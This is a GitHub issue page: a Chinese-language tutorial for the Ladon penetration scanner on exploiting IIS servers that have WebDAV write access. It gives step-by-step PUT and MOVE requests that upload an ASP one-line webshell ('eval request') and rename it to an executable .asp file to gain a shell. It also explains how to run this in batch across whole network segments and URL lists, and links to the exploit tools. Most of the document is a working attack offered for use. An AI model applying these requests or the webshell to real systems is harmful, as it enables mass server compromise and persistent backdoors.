Ladon大型内网渗透扫描器,PowerShell、Cobalt Strike插件、内存加载、无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。网络资产探测32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)或方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等,大量高危漏洞检测模块MS17010、Zimbra、Exchange
4.89k
stars
862
forks
source link
〖教程〗LadonExp使用IIS写权限Webdav漏洞GetShell #26
Open
k8gege opened 4 years ago
原文:http://k8gege.org/Ladon/iisput
LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。
漏洞成因
该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。
IIS配置
1 启用webdav组件 2 目录给写权限(为了方便直接eveyone完全写入权限) 3 脚本资源访问权限(不然MOVE失败即无法GetShell)
漏洞复现
使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video
LadonExp配置PUT
功能:上传123.TXT Target: http://192.168.1.22 Method: Put addurl: 123.txt Data: <%eval request(k8gege)%> 点击buildexe->TestExe测试 成功返回 Created
LadonExp配置MOVE
功能:将123.txt改名1.asp Target: http://192.168.1.22/123.txt Method: Move Destination: http://192.168.1.22/1.asp
点击buildexe->TestExe测试 成功返回 Created
PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell
Ladon批量
扫描C段,当然也可以A段B段
TXT批量
url.txt里放批量地址,不在同一个段的,示例如下 http://192.168.1.1 http://192.10.5.8:808
Exploit
Python实现利用代码
工具下载
最新版本:https://k8gege.org/Download 历史版本: https://github.com/k8gege/Ladon/releases IIS Exp: https://github.com/k8gege/iisput